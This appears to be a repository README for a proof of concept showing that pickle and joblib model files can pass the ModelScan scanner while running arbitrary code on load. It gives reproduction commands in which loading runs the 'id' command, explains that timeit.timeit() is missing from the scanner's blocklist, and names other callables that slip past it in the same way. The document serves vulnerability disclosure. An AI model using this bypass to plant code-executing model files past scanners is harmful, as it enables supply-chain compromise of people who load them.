Upload README.md with huggingface_hub
9ea8e88 verified

ModelScan Scanner Bypass PoC

Proof-of-concept model files that bypass ModelScan's pickle scanner while executing arbitrary code on load.

Files

  • malicious_timeit.pkl — Pickle file using timeit.timeit() bypass
  • malicious_timeit.joblib — Joblib file using timeit.timeit() bypass
  • create_poc.py — Script to recreate the PoC files

Reproduction

# 1. Scan with ModelScan — reports clean
pip install modelscan
modelscan --path malicious_timeit.pkl
# Output: "No issues found!"

# 2. Load the file — executes arbitrary code
python3 -c "import pickle; pickle.load(open('malicious_timeit.pkl', 'rb'))"
# Output: uid=1000(user) ...  (id command executed)

# 3. Same for joblib
python3 -c "import joblib; joblib.load('malicious_timeit.joblib')"
# Output: uid=1000(user) ...  (id command executed)

Bypass Technique

The pickle payload calls timeit.timeit(stmt), which compiles and executes the Python source string passed as stmt. The timeit module is not in ModelScan's unsafe_globals blocklist (modelscan/settings.py), so the scanner does not flag the reference.

Additional unblocked callables that execute code strings in the same way: cProfile.run(), profile.run(), timeit.repeat().